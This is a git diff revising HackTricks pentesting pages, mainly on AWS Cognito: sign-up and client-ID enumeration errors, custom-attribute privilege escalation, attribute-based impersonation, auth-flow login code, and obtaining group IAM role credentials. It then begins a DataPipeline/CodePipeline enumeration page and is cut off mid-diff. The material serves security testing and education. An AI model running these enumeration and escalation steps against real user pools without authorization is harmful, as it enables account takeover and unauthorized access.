+- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script tests which user attributes can be supplied during sign-up.<sup>[[6]](#references)</sup>
 
 ```bash
 python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl
@@ -55,7 +52,7 @@ python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl
 
 ## Registration
 
-User Pools allows by **default** to **register new users**.
+If self-service sign-up is enabled, an app client can **register new users** through the public `SignUp` operation. Whether self-service sign-up is enabled is controlled by the user-pool setting `AllowAdminCreateUserOnly`.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 aws cognito-idp sign-up --client-id <client-id> \
@@ -65,29 +62,29 @@ aws cognito-idp sign-up --client-id <client-id> \
 
 #### If anyone can register
 
-You might find an error indicating you that you need to **provide more details** of abut the user:
+If the pool schema marks an attribute as required, sign-up fails until you **provide that attribute**.<sup>[[7]](#references)[[8]](#references)</sup>
 
 ```
 An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required
 ```
 
-You can provide the needed details with a JSON such as:
+You can provide the needed details with a JSON such as the following, subject to the pool schema and app-client write permissions.<sup>[[7]](#references)[[8]](#references)</sup>
 
-```json
+```bash
 --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]'
 ```
 
-You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name:
+When user-existence errors are not suppressed for the tested username, `SignUp` returns `UsernameExistsException` for a name that is already present, which can expose a username oracle:<sup>[[2]](#references)[[7]](#references)</sup>
 
 ```
 An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists
 ```
 
 > [!NOTE]
-> Note in the previous command how the **custom attributes start with "custom:"**.\
-> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**.
+> Note in the previous command how the **custom attributes start with `custom:`**.\
+> You cannot create a new custom attribute as part of sign-up. You can only submit attributes that exist in the pool schema, and the app client must have write permission for them.<sup>[[8]](#references)</sup>
 
-Or just to test if a client id exists. This is the error if the client-id doesn't exist:
+You can also test whether an app client ID exists; a missing client can produce `ResourceNotFoundException`:<sup>[[7]](#references)</sup>
 
 ```
 An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist.
@@ -95,7 +92,7 @@ An error occurred (ResourceNotFoundException) when calling the SignUp operation:
 
 #### If only admin can register users
 
-You will find this error and you own't be able to register or enumerate users:
+When `AllowAdminCreateUserOnly` is enabled, public sign-up is rejected and the following error may be returned:<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```
 An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool
@@ -103,20 +100,20 @@ An error occurred (NotAuthorizedException) when calling the SignUp operation: Si
 
 ### Verifying Registration
 
-Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this:
+If the pool requires or automatically verifies an email address or phone number, Cognito sends a confirmation code to the value supplied at sign-up. Use an address or number **you control**, then submit the code with the public `ConfirmSignUp` operation:<sup>[[7]](#references)[[9]](#references)</sup>
 
 ```bash
-aws cognito-idp confirm-sign-up --client-id <cliet_id> \
+aws cognito-idp confirm-sign-up --client-id <client_id> \
     --username aasdasd2 --confirmation-code <conf_code> \
     --no-sign-request --region us-east-1
 ```
 
 > [!WARNING]
-> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**.
+> If an email address or phone number is configured as a sign-in alias and already belongs to another user, confirmation can fail with `AliasExistsException` unless the request deliberately uses `ForceAliasCreation`. Do not reuse an alias outside an authorized test.<sup>[[9]](#references)</sup>
 
 ### Privilege Escalation / Updating Attributes
 
-By default a user can **modify the value of his attributes** with something like:
+An authenticated user can update only the attributes that the app client permits it to write, using an access token with the required user-self-service scope:<sup>[[8]](#references)[[10]](#references)</sup>
 
 ```bash
 aws cognito-idp update-user-attributes \
@@ -128,19 +125,18 @@ aws cognito-idp update-user-attributes \
 #### Custom attribute privesc
 
 > [!CAUTION]
-> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself!
+> A custom attribute is a privilege-escalation candidate only when it is mutable and the app client grants write access. If the application trusts a client-controlled value such as `custom:isAdmin` for authorization, changing it may escalate privileges.<sup>[[8]](#references)[[10]](#references)</sup>
 
 #### Email/username modification privesc
 
-You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again).
+Depending on the pool's `AttributesRequireVerificationBeforeUpdate` setting, changing an auto-verified email or phone number either applies immediately or leaves the new value pending verification. After a changed value is applied, Cognito marks the corresponding `email_verified` or `phone_number_verified` value as false until it is verified again.<sup>[[10]](#references)[[11]](#references)[[29]](#references)</sup>
 
 > [!WARNING]
-> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\
-> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**.
+> Whether sign-in with an email address or phone number is available depends on the pool's alias configuration. The ID token can contain the changed `email` and `email_verified` claims; if an application uses an unverified attribute (or another user-controlled attribute) as its identity key without checking it, the change may enable impersonation.<sup>[[8]](#references)[[15]](#references)</sup>
 
-> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**.
+> Likewise, a user who can write the `name` attribute can place an arbitrary value there. If an app uses that claim instead of the immutable `sub` claim to identify users, it may enable impersonation.<sup>[[8]](#references)[[15]](#references)</sup>
 
-Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**:
+If you changed an email address or phone number to a value you control, you can verify it with the code sent to that value:<sup>[[11]](#references)</sup>
 
 ```bash
 aws cognito-idp verify-user-attribute \
@@ -152,11 +148,11 @@ aws cognito-idp verify-user-attribute \
 Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**.
 
 > [!NOTE]
-> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user.
+> An administrator can also enable sign-in with a preferred username. Alias values must remain unique; attempting to reuse one can produce an alias-conflict error.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ### Recover/Change Password
 
-It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there:
+It is possible to start password recovery with a **username**, or with an email, phone, or preferred-username alias when configured. Cognito sends the reset code to an eligible verified recovery attribute:<sup>[[12]](#references)</sup>
 
 ```bash
 aws cognito-idp forgot-password \
@@ -165,9 +161,9 @@ aws cognito-idp forgot-password \
 ```
 
 > [!NOTE]
-> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users
+> With `PreventUserExistenceErrors` enabled, a nonexistent user receives a simulated delivery response instead of a clear user-not-found response. Delivery configuration and other settings can still produce different errors, so verify the behavior for the specific app client before ruling out an oracle.<sup>[[2]](#references)[[12]](#references)</sup>
 
-With the code you can change the password with:
+With the code, you can set a new password using `ConfirmForgotPassword`:<sup>[[13]](#references)</sup>
 
 ```bash
 aws cognito-idp confirm-forgot-password \
@@ -177,7 +173,7 @@ aws cognito-idp confirm-forgot-password \
     --password <pwd> --region <region>
 ```
 
-To change the password you need to **know the previous password**:
+To change a password for an already signed-in user, the access token and previous password are required for password-bearing users:<sup>[[14]](#references)</sup>
 
 ```bash
 aws cognito-idp change-password \
@@ -188,44 +184,41 @@ aws cognito-idp change-password \
 
 ## Authentication
 
-A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\
-Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**.
+A user pool supports **different ways to authenticate**. If you have a **username and password**, several authentication flows may be available. After successful authentication, Cognito can return an **ID token**, an **access token**, and a **refresh token**; additional challenges may be required first.<sup>[[15]](#references)[[16]](#references)[[17]](#references)[[20]](#references)</sup>
 
-- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications.
-  - The ID Token is the token that **contains the attributes values of the user**, even the custom ones.
-- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes.
-- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**.
+- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user**, such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** its **signature** before trusting claims in external applications.<sup>[[15]](#references)</sup>
+  - The ID token contains the user's attribute values, including custom attributes, as strings.<sup>[[15]](#references)</sup>
+- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, the user's groups, and scopes. Its purpose is to **authorize API operations**, including permitted self-service attribute operations.<sup>[[16]](#references)</sup>
+- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): A refresh token can obtain new ID and access tokens while it remains valid. By default it expires 30 days after sign-in; an app client can set an expiration between 60 minutes and 10 years. `REFRESH_TOKEN_AUTH` is unavailable when refresh-token rotation is enabled.<sup>[[17]](#references)</sup>
 
-### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH
+### ADMIN_USER_PASSWORD_AUTH (legacy ADMIN_NO_SRP_AUTH)
 
-This is the server side authentication flow:
+This is the server-side username/password authentication flow. The app calls `AdminInitiateAuth` instead of `InitiateAuth`; the operation requires AWS credentials and the `cognito-idp:AdminInitiateAuth` permission. If Cognito returns a challenge, answer it with `AdminRespondToAuthChallenge`, which requires the corresponding IAM permission.<sup>[[18]](#references)[[19]](#references)</sup>
 
-- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters.
-- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials.
+This **method is not enabled** when the app client uses the default `ExplicitAuthFlows` configuration; enable it with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.<sup>[[18]](#references)</sup>
 
-This **method is NOT enabled** by default.
-
-To **login** you **need** to know:
+To **login** you **need** to know:<sup>[[19]](#references)</sup>
 
 - user pool id
 - client id
 - username
 - password
-- client secret (only if the app is configured to use a secret)
+- client secret (only if the app is configured to use a secret)<sup>[[19]](#references)</sup>
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
-> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**
+> The app client must allow `ALLOW_ADMIN_USER_PASSWORD_AUTH`. A server-side caller needs `cognito-idp:AdminInitiateAuth`; add `cognito-idp:AdminRespondToAuthChallenge` when the flow returns an authentication challenge.<sup>[[18]](#references)[[19]](#references)</sup>
 
-```python
+For a confidential app client, `SECRET_HASH` is the Base64-encoded HMAC-SHA256 of the username followed by the client ID, keyed with the client secret; omit it for a client without a secret.<sup>[[7]](#references)[[27]](#references)</sup>
+
+```bash
 aws cognito-idp admin-initiate-auth \
     --client-id <client-id> \
     --auth-flow ADMIN_USER_PASSWORD_AUTH \
     --region <region> \
-    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
+    --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>' \
     --user-pool-id "<pool-id>"
 
-# Check the python code to learn how to generate the hsecret_hash
+# Check the Python code to learn how to generate the secret hash.
 ```
 
 <details>
@@ -253,19 +246,21 @@ def get_secret_hash(username, client_id, client_secret):
     message = bytes(f'{username}{client_id}', 'utf-8')
     return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
-# If the Client App isn't configured to use a secret
-## just delete the line setting the SECRET_HASH
 def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
     try:
+        auth_parameters = {
+            'USERNAME': username_or_alias,
+            'PASSWORD': password
+        }
+        if client_secret:
+            auth_parameters['SECRET_HASH'] = get_secret_hash(
+                username_or_alias, client_id, client_secret
+            )
         return boto_client.admin_initiate_auth(
             UserPoolId=user_pool_id,
             ClientId=client_id,
             AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
+            AuthParameters=auth_parameters
         )
     except botocore.exceptions.ClientError as e:
         return e.response
@@ -277,27 +272,29 @@ print(login_user(username, password, client_id, client_secret, user_pool_id))
 
 ### USER_PASSWORD_AUTH
 
-This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\
-This **method is NOT enabled** by default.
+This method is a simple **traditional username/password authentication** flow: Cognito receives the password in the request instead of using SRP. Prefer SRP where possible, and treat this flow as an explicitly enabled compatibility option.<sup>[[18]](#references)[[20]](#references)</sup>
+This **method is not enabled** by default when the app client uses the default `ExplicitAuthFlows` configuration.<sup>[[18]](#references)</sup>
 
-The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool.
+Unlike the previous flow, `InitiateAuth` does not require a user-pool ID in the request and does not require IAM permissions for the caller.<sup>[[19]](#references)[[20]](#references)</sup>
 
-To **login** you **need** to know:
+To **login** you **need** to know:<sup>[[20]](#references)</sup>
 
 - client id
 - username
 - password
-- client secret (only if the app is configured to use a secret)
+- client secret (only if the app is configured to use a secret)<sup>[[20]](#references)</sup>
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH.
+> The app client must allow `ALLOW_USER_PASSWORD_AUTH`.<sup>[[18]](#references)</sup>
 
-```python
+For a confidential app client, include the same `SECRET_HASH` calculation described above.<sup>[[7]](#references)</sup>
+
+```bash
 aws cognito-idp initiate-auth  --client-id <client-id> \
     --auth-flow USER_PASSWORD_AUTH --region <region> \
     --auth-parameters 'USERNAME=<username>,PASSWORD=<password>,SECRET_HASH=<hash_if_needed>'
 
-# Check the python code to learn how to generate the secret_hash
+# Check the Python code to learn how to generate the secret hash.
 ```
 
 <details>
@@ -313,7 +310,6 @@ import base64
 
 
 client_id = "<client-id>"
-user_pool_id = "<user-pool-id>"
 client_secret = "<client-secret>"
 username = "<username>"
 password = "<pwd>"
@@ -325,43 +321,46 @@ def get_secret_hash(username, client_id, client_secret):
     message = bytes(f'{username}{client_id}', 'utf-8')
     return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
-# If the Client App isn't configured to use a secret
-## just delete the line setting the SECRET_HASH
-def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
+def login_user(username_or_alias, password, client_id, client_secret):
     try:
+        auth_parameters = {
+            'USERNAME': username_or_alias,
+            'PASSWORD': password
+        }
+        if client_secret:
+            auth_parameters['SECRET_HASH'] = get_secret_hash(
+                username_or_alias, client_id, client_secret
+            )
         return boto_client.initiate_auth(
             ClientId=client_id,
-            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
+            AuthFlow='USER_PASSWORD_AUTH',
+            AuthParameters=auth_parameters
         )
     except botocore.exceptions.ClientError as e:
         return e.response
 
-print(login_user(username, password, client_id, client_secret, user_pool_id))
+print(login_user(username, password, client_id, client_secret))
 ```
 
 </details>
 
 ### USER_SRP_AUTH
 
-This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\
-This **method is enabled** by default.
+This flow uses the Secure Remote Password (SRP) protocol: the client proves knowledge of the password without sending the password to Cognito in the authentication request. This **method is enabled** by default when `ExplicitAuthFlows` is omitted, but app-client configuration can change that default.<sup>[[18]](#references)[[20]](#references)</sup>
 
-To **login** you **need** to know:
+To **login** you **need** to know:<sup>[[20]](#references)</sup>
 
 - user pool id
 - client id
 - username
 - password
-- client secret (only if the app is configured to use a secret)
+- client secret (only if the app is configured to use a secret)<sup>[[20]](#references)</sup>
 
 <details>
 
 <summary>Code to login</summary>
+
+The example uses the `AWSSRP` helper from the [`warrant`](https://github.com/capless/warrant) Python library.<sup>[[21]](#references)</sup>
 
 ```python
 from warrant.aws_srp import AWSSRP
@@ -387,14 +386,14 @@ token_type = tokens['AuthenticationResult']['TokenType']
 
 ### REFRESH_TOKEN_AUTH & REFRESH_TOKEN
 
-This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token.
+When refresh-token rotation is disabled and the app client allows `ALLOW_REFRESH_TOKEN_AUTH`, a valid refresh token can be exchanged for new ID and access tokens. This flow is unavailable when refresh-token rotation is enabled; use the refresh-token API instead.<sup>[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 aws cognito-idp initiate-auth \
     --client-id 3ig6h5gjm56p1ljls1prq2miut \
     --auth-flow REFRESH_TOKEN_AUTH \
     --region us-east-1 \
-    --auth-parameters 'REFRESH_TOKEN=<token>'
+    --auth-parameters 'REFRESH_TOKEN=<token>,SECRET_HASH=<hash_if_needed>'
 ```
 
 <details>
@@ -410,61 +409,71 @@ import base64
 
 client_id = "<client-id>"
 token = '<token>'
+username = '<username>'
+client_secret = ''
 
 boto_client = boto3.client('cognito-idp', region_name='<region>')
 
-def refresh(client_id, refresh_token):
+def get_secret_hash(username, client_id, client_secret):
+    key = bytes(client_secret, 'utf-8')
+    message = bytes(f'{username}{client_id}', 'utf-8')
+    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+
+def refresh(client_id, refresh_token, username=None, client_secret=None):
     try:
+        auth_parameters = {'REFRESH_TOKEN': refresh_token}
+        if username and client_secret:
+            auth_parameters['SECRET_HASH'] = get_secret_hash(
+                username, client_id, client_secret
+            )
         return boto_client.initiate_auth(
             ClientId=client_id,
             AuthFlow='REFRESH_TOKEN_AUTH',
-            AuthParameters={
-                'REFRESH_TOKEN': refresh_token
-            }
+            AuthParameters=auth_parameters
         )
     except botocore.exceptions.ClientError as e:
         return e.response
 
 
-print(refresh(client_id, token))
+print(refresh(client_id, token, username, client_secret))
 ```
 
 </details>
 
 ### CUSTOM_AUTH
 
-In this case the **authentication** is going to be performed through the **execution of a lambda function**.
+In this flow, Cognito delegates the challenge sequence to Lambda triggers. The `DefineAuthChallenge`, `CreateAuthChallenge`, and `VerifyAuthChallengeResponse` triggers can create and verify custom challenges between `InitiateAuth`/`AdminInitiateAuth` and the corresponding challenge-response API calls.<sup>[[22]](#references)</sup>
 
 ## Extra Security
 
 ### Advanced Security
 
-By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.**
+Threat protection's adaptive authentication assigns a risk level using context such as IP address, user agent, device information, and geographic distance. Depending on configuration, it can allow a sign-in, require MFA, or block it. During an authorized assessment, vary those inputs to test the control rather than assuming one sign-in path is representative.<sup>[[23]](#references)</sup>
 
 ### **MFA Remember device**
 
-If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection.
+When device tracking is configured to remember a device, Cognito can replace a later MFA challenge with device authentication for the same device key. Test whether the application configures and validates this state as intended; device authentication still requires an initial password or custom challenge and device setup.<sup>[[24]](#references)</sup>
 
 ## User Pool Groups IAM Roles
 
-It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\
-Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached.
+It is possible to add **users to user-pool groups** and associate an **IAM role** with each group. A user can belong to **more than one group**, including groups with different IAM roles attached.<sup>[[25]](#references)</sup>
 
-Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool).
+Groups cannot be nested. To obtain temporary IAM credentials from a group role, the **user pool must be configured as an authenticated provider for an identity pool**.<sup>[[25]](#references)[[26]](#references)</sup>
 
-Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.**
+To use a group role carried in the user's ID token, configure the identity pool's authenticated role selection to **Choose role from token** (or the equivalent role-mapping setting).<sup>[[26]](#references)</sup>
 
 <figure><img src="../../../../images/image (250).png" alt=""><figcaption></figcaption></figure>
 
-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\
-However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed):
+The roles a user may receive are in the ID token's `cognito:roles` and `cognito:preferred_role` claims. When multiple roles are available, `GetCredentialsForIdentity` can accept `--custom-role-arn` only when the requested ARN appears in `cognito:roles`; otherwise Cognito denies the request.<sup>[[15]](#references)[[26]](#references)[[28]](#references)</sup>
+
+If the identity-pool provider is not configured for role mappings, requesting a custom role ARN can return an error such as the following:<sup>[[26]](#references)[[28]](#references)</sup>
 
 ```
 An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN.
 ```
 
 > [!WARNING]
-> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**).
+> The IAM role assigned to a **user-pool group** needs a trust policy that allows `cognito-identity.amazonaws.com` to assume it for the intended identity pool and authenticated identities.<sup>[[26]](#references)[[28]](#references)</sup>
 
 ```json
 {
@@ -486,11 +495,39 @@ An error occurred (InvalidParameterException) when calling the GetCredentialsFor
             }
         }
     ]
-}js
+}
 ```
 
+## References
+
+- [1] [Amazon Cognito user pools](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools.html)
+- [2] [Managing user existence error responses](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-managing-errors.html)
+- [3] [Pacu](https://github.com/RhinoSecurityLabs/pacu)
+- [4] [Attacking AWS Cognito with Pacu (p2)](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2/)
+- [5] [Cognito Scanner](https://github.com/padok-team/cognito-scanner)
+- [6] [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum)
+- [7] [SignUp](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_SignUp.html)
+- [8] [Working with user attributes](https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-settings-attributes.html)
+- [9] [ConfirmSignUp](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_ConfirmSignUp.html)
+- [10] [UpdateUserAttributes](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UpdateUserAttributes.html)
+- [11] [VerifyUserAttribute](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_VerifyUserAttribute.html)
+- [12] [ForgotPassword](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_ForgotPassword.html)
+- [13] [ConfirmForgotPassword](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_ConfirmForgotPassword.html)
+- [14] [ChangePassword](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_ChangePassword.html)
+- [15] [Understanding the identity (ID) token](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html)
+- [16] [Understanding the access token](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html)
+- [17] [Refresh tokens](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html)
+- [18] [UserPoolClientType](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UserPoolClientType.html)
+- [19] [AdminInitiateAuth](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminInitiateAuth.html)
+- [20] [InitiateAuth](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_InitiateAuth.html)
+- [21] [Warrant](https://github.com/capless/warrant)
+- [22] [Custom authentication challenge Lambda triggers](https://docs.aws.amazon.com/cognito/latest/developerguide/user-pool-lambda-challenge.html)
+- [23] [Working with adaptive authentication](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-adaptive-authentication.html)
+- [24] [Working with user devices in your user pool](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-device-tracking.html)
+- [25] [Adding groups to a user pool](https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-user-groups.html)
+- [26] [Using role-based access control](https://docs.aws.amazon.com/cognito/latest/developerguide/role-based-access-control.html)
+- [27] [Signing up and confirming user accounts](https://docs.aws.amazon.com/cognito/latest/developerguide/signing-up-users-in-your-app.html)
+- [28] [GetCredentialsForIdentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html)
+- [29] [UpdateUserPool](https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_UpdateUserPool.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
@@ -1,10 +1,8 @@
 # AWS - DataPipeline, CodePipeline & CodeCommit Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## DataPipeline
 
-AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed:
+AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed:<sup>[[1]](#references)</sup>
 
 1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly.
 2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently.
@@ -14,9 +12,13 @@ AWS Data Pipeline is designed to facilitate the **access, transformation, and ef
    - Amazon DynamoDB
    - Amazon EMR
 
-In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.
+In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals.<sup>[[1]](#references)[[2]](#references)</sup>
+
+AWS Data Pipeline is in maintenance mode, is unavailable to new customers, and is not planned to receive new features or Region expansions. Existing workloads can continue to operate, but AWS recommends evaluating services such as AWS Glue, Step Functions, or Amazon MWAA for migration.<sup>[[2]](#references)[[9]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI command reference documents the Data Pipeline operations used below for listing pipelines, describing them, reviewing runs, and retrieving pipeline definitions.<sup>[[3]](#references)</sup>
 
 ```bash
 aws datapipeline list-pipelines
@@ -35,9 +37,11 @@ In the following page you can check how to **abuse datapipeline permissions to e
 
 ## CodePipeline
 
-AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define.
+AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define.<sup>[[4]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI command reference documents the CodePipeline operations used below for inspecting pipelines, action executions, pipeline executions, webhooks, and pipeline state.<sup>[[5]](#references)</sup>
 
 ```bash
 aws codepipeline list-pipelines
@@ -58,11 +62,17 @@ In the following page you can check how to **abuse codepipeline permissions to e
 
 ## CodeCommit
 
-It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud.
+It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud.<sup>[[6]](#references)</sup>
 
-It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools.
